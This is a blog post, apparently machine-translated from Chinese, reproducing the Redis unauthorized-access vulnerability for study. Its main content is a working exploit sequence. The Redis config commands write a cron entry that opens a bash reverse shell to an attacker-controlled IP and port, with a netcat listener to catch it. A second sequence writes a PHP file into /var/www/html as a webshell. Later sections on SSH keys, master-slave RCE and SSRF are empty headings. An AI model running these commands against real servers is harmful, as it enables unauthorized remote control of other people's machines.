xfeng

xfeng

健身 技术 阅读 思考 记录
tg_channel
tg_channel
github
bilibili
tg_channel
HomePortfoliosArchivesAbout

Redis unauthorized access vulnerability reproduction

#未授权访问#漏洞复现83
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This article discusses the Redis unauthorized access vulnerability and provides steps to exploit it. By default, Redis is bound to 0.0.0.0:6379, which exposes the Redis service to the public network if no security measures are taken. If Redis is not password protected, it allows unauthorized users to access and read Redis data. Attackers can exploit this vulnerability to perform various actions such as logging into the target server, adding scheduled tasks, and writing web shells. The article also mentions other methods of exploiting Redis, including using scheduled tasks to bounce shells, writing web shells, logging into SSH using Redis keys, utilizing master-slave replication for remote code execution, and using SSRF to bounce shells. The article provides a reference video for further information.

title: "Redis Unauthorized Access Vulnerability Reproduction (Updating)"
date: 2021-12-17T15:42:45+08:00
lastmod: 2021-12-17T15:42:45+08:00
categories: [Vulnerability Reproduction]
tags: [Unauthorized Access, Vulnerability Reproduction]
summary: "Redis is a fully open-source, BSD-licensed, high-performance key-value database."

1. Vulnerability Introduction#

By default, Redis is bound to 0.0.0.0:6379. If no relevant strategies are adopted, such as adding firewall rules to prevent access from non-trusted sources, Redis services will be exposed to the public network. If no password authentication is set (usually empty), this will result in unauthorized access to Redis and reading Redis data by any user who can access the target server.

Attackers can exploit the unauthorized access vulnerability by using Redis's own config command to log in to the target server, add scheduled tasks, write webshells, and perform other operations.

The following operations are performed under the assumption that the Redis unauthorized access vulnerability already exists.

2. Exploiting Scheduled Tasks to Reverse Shell#

Connection tool: https://github.com/caoxinyu/RedisClient/releases

https://github.com/dmajkic/redis/downloads

Run the following on the compromised host connected to the vulnerability:

set xx "\n* * * * * bash -i >& /dev/tcp/IP Address/Port 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

Run the following locally:

nc -lvnp Port

3. Writing Webshell in Redis#

config set dir /var/www/html
config set dbfilename test123.php
set webshell "<?php phpinfo(); ?>"
save

4. Logging in to SSH with Redis Key#

5. Exploiting Master-Slave Replication for RCE#

6. SSRF Redis Reverse Shell#

7. Reference Video#

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.